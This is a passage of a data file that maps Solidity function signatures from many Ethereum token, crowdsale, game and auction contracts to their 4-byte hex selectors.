"changeBackend(address)": "0xeaecfca7", "SomeRegister()": "0x5c590683", "changeContractOwnership(address)": "0x557f4bc9", "tokenRecovery(address,address,uint256)": "0x4555db10", "setRecovery()": "0xe0328c5f", "SimpleTrade(address,address,uint256,uint256)": "0x10b60e65", "getUserDAOsId(address,uint256)": "0x6c8d0bcf", "getUserDAOsCount(address)": "0x03f8008c", "getDAOId(uint256)": "0xa9549f81", "getDAOById(bytes32)": "0xaa22b56b", "createDAO(uint256,string,bytes32)": "0xe7211134", "createForecasting(uint256,uint256,uint256)": "0x1df0e359", "createCrowdsale(uint256,address,string,string,uint256,uint256,uint256)": "0x982a83eb", "createMilestones(uint256,bool,uint256)": "0x4e7455d0", "getBaseInfo(uint256)": "0xaf68dd3f", "Wings(address,address,address,address)": "0x61936d0a", "updateBloomFilter(bytes,address,bytes32[])": "0x69f35883", "initBloomFilter()": "0xee6e1bba", "AnythingToken(uint256)": "0x5f241c8e", "entryCount()": "0x0cbb0f83", "entryInfo(uint256)": "0x39464884", "payout(bytes32)": "0xcfefb3d5", "duration(bytes32)": "0xa37ba32a", "processed()": "0x2ce5c284", "modifyMarking(bytes32,uint256)": "0xc7c0c5bf", "processMarkings(address,uint256)": "0x61064b5a", "addMarking(bytes32,bytes32,int256)": "0xcd8ed6f6", "SpicePayroll(address)": "0xc1cd1759", "isDoneReporting(address)": "0xe0f31fae", "getReportsByReporter(address)": "0xb4921774", "getAllReporterMarketsCount()": "0x2828fc39", "getLimitedReporterMarketsCount()": "0xae436b5e", "getMarketsCount()": "0x27fa35c3", "getLimitedReporterMarkets()": "0x0703ffd1", "getTargetReportsPerReporter()": "0x57670366", "getRequiredReportsPerReporterForlimitedReporterMarkets()": "0x64a31b80", "getMaxReportsPerLimitedReporterMarket()": "0x7b777ecc", "Story()": "0x9aa10ebf", "WISDOM()": "0xcd6ee0c2", "QLFY()": "0xa27e0e67", "addProductEndorsement(string,uint256,int256,bool,string,string)": "0xecfce7b4", "addWineryOperationEndorsement(string,uint256,bool,string,string)": "0xde4125b0", "addHarvestOperationEndorsement(string,bool,string,string)": "0x4a7b8f21", "addVineyardEndorsement(string,uint256,bool,string,string)": "0xd52b8a0e", "addUserEndorsement(address,bool,string,string)": "0x47a66b57", "Endorsements()": "0xd8ba6de2", "CikkaCoin()": "0x3cf682b8", "Needit()": "0x54569a86", "eduCash(uint256,string,string)": "0xa8e3371a", "GoldMintToken()": "0x6b3f94ab", "IchigoToken()": "0x667fc6b9", "offlineSell(address,uint256)": "0xfb5f39dd", "executeSell(address,uint256)": "0x549503e5", "autoSell(address,uint256)": "0xa824bd9a", "TokenContract(address)": "0x84f08cd9", "ConunToken(uint256,string,uint8,string)": "0xbb77d7d8", "reserves(address,address)": "0xea4afc54", "connectors(address,address)": "0xaf722ea7", "connectorTokens(uint256)": "0x19b64015", "conversionFee()": "0x579cd3ca", "maxConversionFee()": "0x94c275ad", "quickBuyPath(uint256)": "0xe7ee85a5", "extensions()": "0x24f159c2", "xxx()": "0x1c6d31f7", "KickSportsManager()": "0x5dc54308", "withdrawUnsoldTokens()": "0xc8bdbfb6", "changeRateOfToken(uint256)": "0xf8b4e080", "processOffChainPurchase(address,uint256)": "0xe211003d", "activateMainSale()": "0xccd65c0a", "LMDA()": "0x0e840284", "_createPerson(string,address,uint256)": "0x34a5eaa9", "getAnime(uint256)": "0x666cdaa0", "createContractPerson(string)": "0x4955f280", "createPromoPerson(address,string,uint256)": "0x42287b66", "AnimeToken()": "0x6557dfc8", "returnTokens()": "0xf9718fc8", "Airdropper(address,uint256)": "0x21f6b513", "_createLibrary(string,string,address,address,uint256,uint256)": "0x6050eeb4", "setFounder(uint256,address)": "0x99384976", "allTokens()": "0x6ff97f1d", "tokensOfFounder(address)": "0xc3f3310b", "withdrawFounderFunds(uint256)": "0x03edae57", "calculateFounderCut(uint256)": "0xa2ac5360", "fundsOf(uint256)": "0xb76c94e1", "founderOf(uint256)": "0x4f5f560a", "getLibrary(uint256)": "0xd15d62a7", "createLibraryBounty(string,string,address,uint256)": "0x18abb75c", "createLibraryWithFounder(string,string,address)": "0x5375a828", "createLibrary(string,string)": "0x078b55e6", "LibraryToken()": "0x1fbda78f", "LEBRON()": "0xf2afe985", "TemplateToken(uint256,string,uint8,string)": "0xf32106f0", "setCapTab(uint256,uint256)": "0xe6774e1e", "getCapTab(uint256)": "0x04bd85f0", "getTokenRate()": "0x3e2d7004", "_sendTokensManually(address,uint256,uint256)": "0x00b526e4", "_EnvoisTokens(uint256,uint256)": "0xf3c51c84", "computeTokenAmountAll(uint256)": "0x482a0bc9", "isMainSale()": "0xd1f2efd5", "isPreSale()": "0x4ced4734", "currentStepIndexAll()": "0x92da856d", "currentStepIndexByDate()": "0xdeadc3dc", "ODEEPToken()": "0xa6c6aee1", "updatePresaleNumbers()": "0x685b47c7", "endPresale()": "0xa43be57b", "presale(address,uint256,uint256)": "0x45645572", "removeAddressManual(address)": "0xc121be4d", "addAddressManual(address)": "0xb58c2d31", "changeHoldingTaxInterval(uint256)": "0x4e9833ac", "changeHoldingTax(uint256)": "0xc25fe1a4", "chargeHoldingTax()": "0xa610fe9b", "changeTxnTax(uint256)": "0xeaf214ea", "Token(string,string,uint256,bool,bool,string,string,uint256,uint256,uint256,bool)": "0x6709b337", "scuttle()": "0x11448a56", "getPromoLOTEarnt(uint256)": "0x524aae98", "getTktPrice()": "0x46183d06", "hasRedeemed(address,address,uint256)": "0xe0328c80", "getLOTBalance(address,address)": "0x9a6dac14", "getWeek()": "0x874d6d81", "togglePromo(bool)": "0x1f0815ce", "getNumEntries(address,address,uint256)": "0xff377705", "EtheraffleLOTPromo()": "0x6f53df6c", "getUserNumEntries(address,uint256)": "0xe5f6f252", "unclockAddressDuringITO(address,address)": "0xfcfc208e", "Banliang()": "0x7137b024", "UBCToken()": "0x98f7ba63", "MercuryCrowdsale()": "0x865733da", "allowMinting()": "0x1602a124", "MercuryToken()": "0xf34a5e85", "TelonToken()": "0x9ddccc99", "CosmicExperiencePoints()": "0xd6d98ffc", "ekkoBlock1(uint256,string,uint8,string)": "0xbc83a6fb", "erc20FOBS(string,uint8,string)": "0x4ee7ca3a", "DU30Token(string,uint8,string)": "0xe16e93aa", "GoldenChain()": "0x9721dd4c", "sendAVR(address,uint256)": "0x9c402944", "setWalletOut2(address)": "0xd9ff8e9d", "cancelOrder(address[3],uint256[5],int256,int256)": "0xfc51b9c5", "tradeOrder(address[3],uint256[5],int256,int256,uint8,bytes32,bytes32)": "0x930a9d92", "MarketContract(string,address,address,uint256[5])": "0x2460f09d", "getClaim(string,string,address,uint256)": "0x4a78a594", "createClaim(string,string,address,uint256,string)": "0xe57e6593", "isWarrantyValid(address,string,string)": "0xb29b686a", "getWarrantyByIndex(uint256)": "0x08dc615c", "getWarranty(string,string,address)": "0x27c67440", "cancelWarranty(string,string,address)": "0xf2dfd7f5", "confirmWarranty(string,string,string)": "0xbeadd203", "createWarranty(string,string,address,uint256,uint256,uint256)": "0x413992b3", "getWarrantyQuote(string,address,uint256,uint256,uint256)": "0x00ac4663", "getRole(address)": "0x44276733", "isRegisteredRetailer(address,address)": "0x5781d9e7", "setSubContractAddresses(address,address)": "0xbbab867c", "Insurechain(address,address)": "0x2e2b5809", "decreaseClaimsBalance(address,address,uint256)": "0xb28bf6af", "increaseClaimsBalance(address,address,uint256)": "0xfc01ce83", "decreasePaymentsBalance(address,address,uint256)": "0x78248880", "increasePaymentsBalance(address,address,uint256)": "0x7980a1ab", "decreaseSalesBalance(address,address,uint256)": "0x7a4f2fde", "increaseSalesBalance(address,address,uint256)": "0x8f60cf17", "getRetailerTotalBalances(address)": "0xf235bdfd", "getRetailerBalances(address,address)": "0xb4ac8ad9", "getRetailerByAddress(address,address)": "0xbc032967", "getRetailer(uint256,address)": "0x86096578", "getRetailerStatus(address)": "0x43ca57bc", "getRetailerStatus(address,address)": "0x3592336c", "getRequestState(address,address)": "0x3e788ba3", "getInsurance(address,uint256)": "0xc59361b9", "requestRegistration(string,address)": "0x3821891e", "setSubContractAddresses(address)": "0xcd728815", "RetailerManager(address)": "0x90b9be4a", "decreaseClaimsBalance(address,uint256)": "0xa8f0ebeb", "increaseClaimsBalance(address,uint256)": "0x3baf77aa", "decreasePaymentsBalance(address,uint256)": "0xd07f8181", "increasePaymentsBalance(address,uint256)": "0x659eeef1", "decreaseSalesBalance(address,uint256)": "0x1b42b7ab", "increaseSalesBalance(address,uint256)": "0x6f04ff33", "getInsuranceBalance(address)": "0x637b93ed", "getWarrantyPrice(address,string,uint256,uint256,uint256)": "0xe4eab468", "getInsuranceStatus(address)": "0x19254e2e", "getInsuranceByAddress(address)": "0x5ba05024", "getInsurance(uint256)": "0x85fae602", "createInsurance(string,address)": "0x65bb193e", "isInsurance(address)": "0xaa877470", "getWarrantyPrice(string,uint256,uint256,uint256)": "0xfab4cb39", "cash(address,uint256,uint8,bytes32,bytes32)": "0xfbf788d6", "deny()": "0xa3fdfee3", "requireTokenFuel(address[])": "0xf63cb8a3", "cancelSale(address[])": "0x42261ea4", "refuseSale(address[])": "0xde18dd18", "acceptSale(address[])": "0xf1765b22", "buyAsset(address)": "0x86bb5a48", "cancelSellOrder(address[])": "0xae0b4edd", "sellAssets(address[],uint256[])": "0x7f7fde8e", "cancelInvestment(address[])": "0x88f1ccf2", "refuseInvestment(address[])": "0x08bfdd76", "withdrawFunds(address[])": "0xef42b5da", "invest(address[],uint256)": "0x93920e8f", "createOfferAssets(uint256[],string,uint256,uint256)": "0x066cd2c6", "createOffer(uint256,uint256,string,uint256[])": "0x0d9049f2", "SwapyExchange(address,address)": "0xfe2e5db4", "Market(bytes,uint256)": "0x55ebcc83", "burnTokens(uint256)": "0x6d1b229d", "RareToken()": "0x4766ae68", "ERC20Token(string,string,uint8,uint256)": "0xfbbedf5c", "transferFund(address,uint256)": "0xe2dc35e0", "emit(uint256)": "0x195977a6", "removeOfficer(address)": "0x719a0f8c", "addOfficer(address)": "0xd9803cb2", "CryptoRUB()": "0x7d02db72", "setBytes32(bytes32,bytes32)": "0x4e91db08", "setAddress(address,address)": "0x3b58524d", "setUint256(int256,uint256,uint256)": "0x933dc51b", "setInt256(int256,int256)": "0xd69dd156", "setUint8(int8,uint8,uint8)": "0x9787a6b3", "setInt8(int8,int8)": "0x788d1fa6", "setBool(bool,bool)": "0xe4eaee4c", "getOwnerByName(bytes32)": "0x2b901a0a", "getEntryByName(bytes32)": "0x5754aadc", "deleteEntryByName(bytes32)": "0x72927b1e", "register(bytes32,bytes32)": "0x2f926732", "getParticipantData(address)": "0x5c47ead7", "joinTheHunt(string,string)": "0x97296421", "getContractInfo()": "0x7cc1f867", "ConstructHuntStart()": "0x30c5375e", "setLimits(uint256,uint256)": "0xc4590d3f", "Product(string)": "0x47244212", "easyUpdateMatriarch(address)": "0x60785bd1", "toggleTransfers()": "0x3e5ac28f", "passed(uint256)": "0x0a0155e5", "getWeight(address)": "0xac6c5251", "MeDao(address,address,address,address,address,uint256)": "0x6a1eb83f", "testMintInvalid(int256)": "0xfb277a24", "testMintableToken()": "0xb5c8b021", "FooBurnableToken()": "0x8dde907e", "FooMintableToken()": "0xe4bc01b4", "FooStdToken()": "0xffbfd38b", "allowPrivateParticipant(address,uint256)": "0x8d647d3a", "approveAgreement()": "0x19dec62a", "RentalAgreement()": "0xd36e9b2a", "totalAllowance(address,address)": "0xc44828be", "donateToWhale(uint256)": "0xfaee4402", "wager()": "0x667d5d22", "OpenToThePublic()": "0x4a376c97", "SSChainToken()": "0x500e73a4", "TerrariumCoin()": "0xbcf0e1ea", "dispute(bool,address)": "0x14607fc2", "ticket(bool)": "0x7bb9c776", "rentModified(uint256)": "0xca82a7c8", "RinneganToken()": "0x5e0c923a", "zasxzasx()": "0x823bce43", "SimpleERC20()": "0x225386fe", "abortSale()": "0x03bcf11d", "TIANYECoin()": "0x6de79d17", "getVirtualTradesSummed(bytes32,uint256)": "0xf69a6982", "getIntervals(bytes32,uint256)": "0xeb49168f", "virtualTradesSummedCount(bytes32)": "0x29e3ae3d", "intervalsCount(bytes32)": "0x7d61b9fe", "vpfHash(bytes32,uint256,uint256)": "0xc510187e", "updateValue(bytes32,uint256)": "0x3fa4ed06", "fillTradesInfo(bytes32,uint256,uint256[])": "0x4f0cf7e1", "addVpf(bytes32,uint256,uint256,uint256,string,uint256,uint256[])": "0x59b4ee89", "request(bytes32,string,uint256)": "0xe827f7f3", "generateNext()": "0xaad5632a", "payback(uint64)": "0x8ba8da61", "initiateEscrow(uint64,uint256,address,address,address,address)": "0x106bd2da", "SocialMediaToken()": "0xcbc69c8d", "Pruebacoin123()": "0xee339fd7", "RentOffice()": "0xfcad8cf3", "Office(string,string,uint256)": "0xd2b9da84", "resetRental()": "0x0cd0c3d7", "returnRental()": "0xd1c13abd", "forceRentalEnd()": "0xa611e0e6", "rentalTotalTime()": "0x6a9d69a7", "rentalTimeRemaining()": "0xdb22032f", "rentalBalanceRemaining()": "0x53c2828f", "rentalAccumulatedPrice()": "0xb6b7032e", "rentalElapsedTime()": "0x87d5c6b8", "setRentalPricePerSecond(uint256)": "0x53ffe1f9", "setRentalPricePerDay(uint256)": "0xabfdfbe6", "setRentalPricePerHour(uint256)": "0xccfaa72f", "setAvailable(bool)": "0xe2df20d1", "rentableSetup(uint256,uint256,uint256)": "0x2a0f3c35", "Rentable()": "0x82154075", "addCard(string,uint8,string,string,string)": "0xbe60989d", "OxBioToken()": "0x0186aa16", "allocateProofTokens()": "0xbf2860a4", "forceStart()": "0xff85fba2", "lockMasterTransfers()": "0x2bb70e54", "enableMasterTransfers()": "0x24fad665", "lockTransfers()": "0x82b74b89", "getPriceInWei()": "0xfc504655", "TokenSale(address,uint256,uint256)": "0x7ceac0b8", "readPublicRecord(bytes32,bytes32)": "0xdf3f5974", "writePublicRecord(bytes32,bytes32,string,uint8,bytes32,bytes32)": "0x05f04e46", "changePasswd(bytes32,address,uint8,bytes32,bytes32)": "0x436108ce", "WESSToken()": "0x867ea029", "payforRefund()": "0x76640648", "SbloccaConto(address)": "0xf72b7ab9", "BloccaConto(address)": "0x11fb584a", "RimuoviMiner(address)": "0x26767298", "AggiungiMiner(address)": "0xed007cb6", "RimuoviNegoziante(address)": "0xd674d6a1", "ANUNYA()": "0x84e336fc", "_sendTokens(address)": "0x4f9de158", "sendTokensToInvestors(address)": "0x52f662bb", "withdrawTokensByInvestors()": "0xbbcc69ef", "TheMMORPGToken()": "0x56d27150", "isActive(uint16)": "0x6cb136ba", "addAuction(uint40,uint40,uint128)": "0x97b740e2", "Duanwu()": "0x766bd930", "testEthIcoToken()": "0x4afd8a98", "tokenMultiTransfer(address)": "0x26483bcd", "tokenWithdraw(address,uint256,uint256)": "0xd4b3f5b6", "setTokenDecimals(uint256)": "0xb97af2c8", "setEthPerToken(uint256)": "0xaca31e61", "setPayLock(bool)": "0xf3637d51", "pledge(bytes32)": "0x76bf8044", "smartSponsor(address)": "0xf9190fcc", "GBCoin()": "0x2570c13d", "Approve(uint256,bool)": "0x31b6421e", "AddBook(uint256,string,address)": "0xc9ab521f", "FourArt()": "0xe944267c", "getMintOwner()": "0xe569c1d4", "TielseEendrachtCombinatie()": "0x7bc9d4ba", "transferETH(uint256)": "0x4329db46", "retrieveToken(address,address)": "0x2961320c", "sendTokensSingleValue(address,address,address[],uint256)": "0xcb810ea9", "sendTokens(address,address,address[],uint256[])": "0x4a26920b", "authenticate(uint256)": "0x195ad926", "makePurchase(uint256,address,string)": "0xeecf78b3", "getPurchases()": "0xc47f0f90", "getPurchaseRequests()": "0x99d4aec9", "HolikopterTokenToken()": "0x987bc844", "ApolTestToken()": "0x20f4014a", "PrelievoProprietario(uint256,uint256)": "0x5b3f4d24", "Vendi(uint256)": "0xdd413da0", "Compra()": "0xe92f2904", "output()": "0xf20eaeb8", "ico_allocation()": "0xb4b22b5e", "getCoinAge()": "0x33bb70ee", "totalHedgelyWinnings()": "0x376ed9c6", "TLN_TOKEN_DECIMALS()": "0xf22ffd1d", "promoCreationLimit()": "0xb5319335", "deathData_v4()": "0xe382fe45", "airdropAddress()": "0x84413b65", "hostingProfitAddress()": "0x0440187e", "recipient()": "0x66d003ac", "labAddress()": "0x3557c1f6", "firstWeekBonusInWeek()": "0xe650ca40", "nfsPoolLeft()": "0x0a56a5f3", "tokenZNT()": "0xcf70ba36", "total_claim_codes()": "0x2128a580", "newTankType()": "0xf3444701", "preico_holdersAmountInvestWithBonus()": "0x58c264f6", "mainSaleEnd()": "0x8b519e09", "get_available_interest_amount()": "0x424ddaac", "whitelistBonusClosingTime()": "0x1720684a", "deprecatedSince()": "0x6dd28241", "lastBlock_v9Hash_uint256()": "0x699be1bb", "nextStageEmission()": "0xc979113c", "PHASE_2_PRICE()": "0x72fb54e5", "market_communityStorageVault()": "0x67ca1fdf", "wallet_Address()": "0xd15fc954", "MANAGEMENT_LOCKED_ALLOC()": "0x3fd76a98", "hashKey()": "0xd404ea23", "ethraised()": "0xc3762904", "receiverThree()": "0xac5e7977", "postFreezeDevCATDestination()": "0xda0f3877", "countOfCell()": "0x8e15e94b", "PRICE_MULTIPLIER_ICO5()": "0x8449b0af", "logoX()": "0x715469d0", "MAX_COMMISION()": "0xd8f71809", "finishFreeGetToken()": "0x97b68b60", "golix()": "0xf8a9c6ae", "PRICE_STAGE_FOUR_BONUS()": "0xd1cdcf71", "collectorWeiCap()": "0x63a167f2", "totalGen0()": "0x7230ef7f", "checker()": "0xcf5303cf", "tranferToReserve()": "0x1b33a497", "userClaimAmt()": "0x6b32c591", "total_users()": "0xe7cc62bd", "TLD_NODE()": "0x96df3540", "ICO_Live()": "0x153913e3", "BONUS_ICO_STAGE1_PRE_SALE5()": "0xee38c7d3", "baseToken()": "0xc55dae63", "minAmountToGetBonus()": "0xc1ce6647", "startTimePrivatePreICO()": "0x9a2fb8c1", "allowBack()": "0xf444ea30", "AgriChainDescription()": "0xa5d8628a", "capDay1()": "0xbeb3a38f", "numberOfGuesses()": "0xed02ad37", "penultimateFeePeriodStartTime()": "0x30443062", "totalTokensForSaleDuringICO1()": "0xd9a18f6d", "BUILDING_PRICE()": "0x63ba7319", "Parents()": "0xddec60d9", "etherProceedsAccount()": "0xf3333e7f", "megaRate()": "0xb5c47f69", "oracleConfig()": "0x324b8d6e", "selectFight2DeathContract()": "0xd5f17df2", "phaseThreeLimit()": "0x0d826264", "quarterSecond()": "0x684d9a04", "winnerDeterminedDate()": "0x00c42173", "onlyAdminsFriends()": "0x96bc0f94", "purchaseBuilding()": "0x7276509c", "chickenTokenDelegator()": "0xdba8be6e", "giftIsFrom()": "0xfbee7b58", "partner_2_name()": "0xf8efaf2b", "CONTRIB_PERIOD3_STAKE()": "0x86cef432", "PER_USER_MAX_AVATAR_COUNT()": "0x34df8b63", "highestBindingBid()": "0xf5b56c56", "callDividendAndUserRefund()": "0x3376e2dc", "participantIndex()": "0x53ce7de9", "tokensPerOneEther()": "0xee3e3e2a", "endingBlock()": "0x7b1f337d", "whitelistEnabled()": "0x51fb012d", "CREATE_PERMISSIONS_ROLE()": "0x3d6ab68f", "circulatingFame()": "0x5a9ffc35", "bonusTokensAllocated()": "0x15752ac5", "ACTION_BUY_OFFER_ACCEPTED()": "0xcedcbd99", "phaseThreeBonusPercent()": "0xa9553d74", "baseComparable()": "0x3b5e5376", "burnBonuses()": "0xac5c915f", "hashLast()": "0xbc851718", "tipoCongelamento()": "0x444c8daf", "epoch()": "0x900cf0cf", "erc()": "0xa6b87b52", "FOUNDATION_WALLET()": "0x2a7caaec", "currentCheckpointId()": "0x5488cc80", "RANGESTART_8()": "0xe4c60492", "showVault()": "0xeb70095d", "betAddrsCount_()": "0xfde074c8", "CROWDSALE_WALLET_ADDR()": "0x8e1b9f42", "exchangePrice()": "0x9e65741e", "roundId()": "0x8cd221c9", "product4_pot()": "0x5cfd5f89", "liquidAllocatable()": "0xba255cd1", "powerDayEndTime()": "0xe943cc01", "melonToken()": "0x6b915d43", "RITUAL_COMPENSATION()": "0x3321c76c", "owner3()": "0xb6f36dcf", "rndGap_()": "0xb74bd09e", "reserveVault()": "0xcef062fc", "startDate1()": "0xc5ddba02", "cleanupDelay()": "0x387621fb", "omniTeamAddress()": "0x7bc6aa07", "roundCount()": "0x127f0b3f", "earliestNextSettlementTimestamp()": "0x1fa422a2", "CROSS_RESERVE_FTX()": "0xea045f34", "totalDistributionAmountInWei()": "0xa60c8043", "paymentToken()": "0x3013ce29", "BuyRTCtokens()": "0xff8f9de7", "marketingFundAddress()": "0xb7ac5d3b", "minBuyTokens()": "0x28c6cd05", "boomrToken()": "0x85cc6fba", "walletThree()": "0x2272f879", "MIN_TOKEN_INVEST()": "0x7365babe", "HOUSEEDGE_inTHOUSANDTHPERCENTS()": "0x076a39a0", "tokenSaleClosingTime()": "0x10d6a13a", "priceFactorC()": "0x015def53", "tokenTrueUSD()": "0x68b5c351", "seed_coins_vault1()": "0x2d6653a9", "CROWDSALE_GASPRICE_IN_WEI_MAX()": "0xafcced41", "ICO_FINISH()": "0x2ce0b4f6", "buyEggPrice()": "0x1c9c549d", "rules()": "0x52f6747a", "start_token_time()": "0x44559f80", "Reward()": "0xe2e15f2e", "crowdsaleRaised()": "0x6a1cd82c", "BAG_TRANSFER_MINIMUM_AMOUNT_OF_BUYS()": "0xf7dd2e28", "benAddress()": "0xea4dfce9", "nextSupplyAfterBlock()": "0x7ef4cabb", "withdrawDev()": "0x9602e9d5", "TOKENS_CAP_ICO()": "0x0719d365", "finalStageRefund()": "0x2621b6e3", "year3LockAddress()": "0x74ce97fe", "unpause_2()": "0xde341661", "userlength()": "0xe9a24e24", "Addr2()": "0x43212413", "tokensForSiteReg()": "0x00851303", "maxLevel()": "0xcc06c359", "hotwalletAddress()": "0x771c7ad1", "gripWallet()": "0x6cca60ba", "WAIT_TIME()": "0x388aef5c", "JackpotTimer()": "0x44e2cc24", "burningPercentage()": "0x0789fc01", "randomSeed()": "0x0b747d91", "finishCurrentLimit()": "0x08ac184b", "numberOfContracts()": "0xc435d68e", "balanceAtSnapshot()": "0x1f7fe78b", "POSTSALE_START()": "0x008c1b28", "totalDeposit()": "0xf6153ccd", "HUT34_RETAIN()": "0xff41f5cc", "delegateAddresses()": "0x8006a5d3", "maxInvestorCap()": "0x5fd8d3d1", "tokensReceived()": "0x3bb0cc55", "bonusRangeCount()": "0x1c054b14", "dspRegistry()": "0xb299708d", "RegistryAddress()": "0x58620daf", "totalPlayer()": "0xc494a080", "cashilaTokenSupply()": "0xb81ccdd5", "noOfTokenAlocatedForPresaleRound()": "0x0b27fa51", "artist()": "0x43bc1612", "JACKPOT_TOKENS_PERCENT()": "0x59ab0dd1", "impToken()": "0x38d888a6", "PendingOwner()": "0x95029f34", "CreateNewAccount()": "0x0ef270d5", "tokenFree()": "0x96c5406d", "discountTime()": "0x90b0e078", "companyTokensCurrent()": "0x2e35d7a8", "getCurrentImpeachmentVotesSupporting()": "0x41f4793a", "refundPreIco()": "0xcc41d3b2", "PunaniSupply()": "0x43cf5f0c", "salesSupply()": "0x814ab9f1", "toggleTrading()": "0x0f120fc3", "toJackPotfromEveryTicket()": "0x6cf124c6", "dailyCount()": "0x90aa2185", "window2TokenCreationCap()": "0x28d4cc24", "stopCrowdsaleTime()": "0x18bd5108", "actualPrice()": "0x8c648117", "preSaleToken()": "0x7776466c", "freeTokenTime()": "0xa30eb0ef", "destTokensAngel()": "0x5e8507f8", "icoNumeratorPrice()": "0x19476244", "TokenManagerEntity()": "0x51fc6f59", "BENEFICIARY()": "0x2f99c6cc", "constructionStart()": "0xa0ea0ef9", "totalContributorsContribution()": "0x491e0df0", "balance3()": "0xf24a0faa", "lambosBuildCount()": "0xf92561f3", "LKCExchangeRate()": "0x2b028bbb", "COMMISSION_DIV()": "0x168c8120", "ROLE_EXCHANGER()": "0x42df7085", "DAYS_31()": "0xefaf90c8", "lockupEndTime()": "0x266d7bda", "egrToken()": "0xbccf0972", "woe()": "0x2da8d3e6", "_v2()": "0xc56597ba", "updateMinSale(uint256)": "0x78583275", "updateUnidentifiedSaleLimit(uint256)": "0xbf815059", "returnSuspendedPayments(address)": "0x41910104", "unidentifyParticipant(address)": "0xe9f9d8e2", "markParticipantIdentifiend(address)": "0x123807b2", "endCrowdsale(bool)": "0x99fd9489", "unPauseCrowdsale()": "0x286dd83c", "startCrowdsale(address,address)": "0x4a184f51", "proxyExchange(address,uint256,string,bytes32)": "0x5db46961", "processPayment(address,uint256,bytes32)": "0xab3640c8", "exchangeCalculator(uint256,uint256,uint256)": "0xcc4fa81b", "tokensOnSale()": "0x57241f8e", "setUnboundedLimit(address,bool)": "0x85861b15", "gameOver()": "0xbdb337d1", "burnCadvsLeftInRefunding()": "0x613696eb", "forceRefunding()": "0x964ecc09", "retrieveFounds()": "0xc741d70d", "resetPhases(uint256,uint256,bool,uint256,bool)": "0xc6fe7296", "addPhases(uint256,uint256,bool,uint256,bool)": "0x90afca4c", "currentPhaseId()": "0x40c5b34e", "isPhaseValid(uint256)": "0x73f5cfb1", "CoinAdvisorCrowdSale(address,address,uint256,uint256)": "0x48941312", "multipleTransfer(address[],uint256)": "0xa5be1a4d", "getTeamTokens()": "0xa6d2bff6", "getVIATokens()": "0x62cf0197", "AgrolotToken()": "0x3ac9dfa3", "withdrawToWallet()": "0x03ba27f6", "powerUpContract()": "0x5b389dbb", "CapitalTechCrowdsale(address,address,address)": "0x6e8d3007", "FinalizableCrowdsale(address,address)": "0xd718e763", "calculateRate(uint256)": "0x319b0cd2", "GPUMining()": "0x3541d365", "Deadpool2RottenorFresh()": "0xea85b581", "TUINETWORK()": "0x08d0ca62", "distribute(address[],uint256[],bytes32[])": "0x4c6c8bc3", "timelockAllocationAddress(address,uint32)": "0xe02c7e1f", "unlockAllAllocationAddresses()": "0xc1b58f6c", "unlockAllocationAddress(address)": "0x8eeb7d11", "lockAllocationAddress(address)": "0x516d70c3", "allocateInitialBalances(address[],bytes32[],uint256[])": "0xb7909898", "configureTokenParams(string,string,uint256)": "0x15ef29c3", "UKTTokenController(bytes32,bytes32)": "0x6eca4a50", "TRUE()": "0x5994d984", "_triggerCooldown(uint256)": "0xd54c7b4f", "_breedWith(uint256,uint256,uint256)": "0x36d505cf", "_createMonster(uint256,uint256,uint256,uint256,uint256,bytes,address)": "0x7c68e078", "isValidMatingPair(uint256,uint256)": "0xcd7fb38c", "computeCooldownSeconds(uint16,uint16)": "0x4c8f3562", "giveBirth(uint256,uint256,uint256,bytes)": "0x49ec7c3f", "createSystemSaleAuction(uint32,bytes,uint16)": "0x2da4dddd", "createPromoMonsterWithTokenId(uint32,bytes,address,uint256)": "0x357fe12a", "createPromoMonster(uint32,bytes,address)": "0x94636cee", "getHatchDurationMultiByGeneration()": "0xbb245283", "setHatchDurationMultiByGeneration(uint32[])": "0x74888914", "getHatchDurationByTimes()": "0x9ae6303d", "setHatchDurationByTimes(uint32[])": "0xc547e14d", "setAllHatchConfigs(uint32[],uint256,uint32[])": "0xa5298955", "withdrawBalancesToLogic()": "0x1862c10b", "withdrawBalancesToNFC()": "0x84125e0b", "setActivityCoreAddress(address,address)": "0x04a48c27", "CryptoZoo(address,address,address)": "0xfa796fa1", "Zoo721(address)": "0x1e06e25e", "SiringClockAuction(address,address,uint256,uint256)": "0xfb3d8b6e", "computeNextSystemSalePrice()": "0xed879c77", "systemOnSaleCount()": "0x0e8ef0c1", "totalSoldCount()": "0xf73052e8", "setSystemAuctionDuration(uint256)": "0xf212c216", "setSystemEndingPrice(uint256)": "0x14c33c24", "setSystemStartingPriceMin(uint256)": "0xdd489e44", "setSystemSaleAddress(address)": "0x4616fc3f", "createSystemAuction(uint256)": "0x6baa0f8e", "SaleClockAuction(address,address,address,uint256,uint256)": "0xde59a5cb", "_currentPrice(uint256)": "0xfc65f812", "isValidPrice(uint256,uint256)": "0xa43d76e9", "getMinPrice()": "0xe31a8116", "setMinCutValue(uint256)": "0xc501024b", "ClockAuction(address,address,uint256,uint256)": "0xc90de215", "averageSoldPrice()": "0x4ccef7e0", "recordSoldPrice(uint256)": "0x06cc2cd2", "recordSystemOnSaleToken(uint256)": "0xfd7ffdb8", "addAuction(uint256,address,uint128,uint128,uint64,uint64)": "0xda26d0b9", "decreasePregnantCounter()": "0x503c449f", "increasePregnantCounter()": "0xcc57e4f8", "increaseSystemCreatedCount()": "0x56f1d2dc", "increasePromoCreatedCount()": "0x40ceb451", "deleteMonsterIndexToApproved(uint256)": "0xa51ba542", "setMonsterIndexToApproved(uint256,address)": "0x32708966", "decreaseOwnershipTokenCount(address)": "0x1be6ce57", "increaseOwnershipTokenCount(address)": "0x6bfaa903", "setMonsterIndexToOwner(uint256,address)": "0x40a401d0", "updateProperties(uint256,bytes)": "0x12f62bd6", "getProperties(uint256)": "0x1b8ca217", "getMonsterNum(uint256)": "0x4ad25557", "getMonsterId(uint256)": "0x0516af06", "getBirthTime(uint256)": "0x4f5af739", "setCooldownEndBlock(uint256,uint64)": "0x2a804835", "getCooldownEndBlock(uint256)": "0xa5cbe71c", "getGeneration(uint256)": "0x56e3df97", "setCooldownIndex(uint256)": "0x1f6d2086", "getCooldownIndex(uint256)": "0xd6c8f93c", "node_height(uint256)": "0xe973b7ba", "node_side(uint256)": "0x48da1532", "node_parent(uint256)": "0x5014a18e", "node_right_child(uint256)": "0x21f0a727", "node_left_child(uint256)": "0x66d5c8ed", "median()": "0x77049457", "at_permille(uint256)": "0xd9269cb4", "permille(uint256)": "0x598ac8f2", "at_percentile(uint256)": "0xfa2b579d", "percentile(uint256)": "0x3b5f24eb", "in_top_n(uint256,uint256)": "0x37da8058", "duplicates(uint256)": "0x9f853717", "select_at(uint256)": "0xe832fda3", "rank(uint256)": 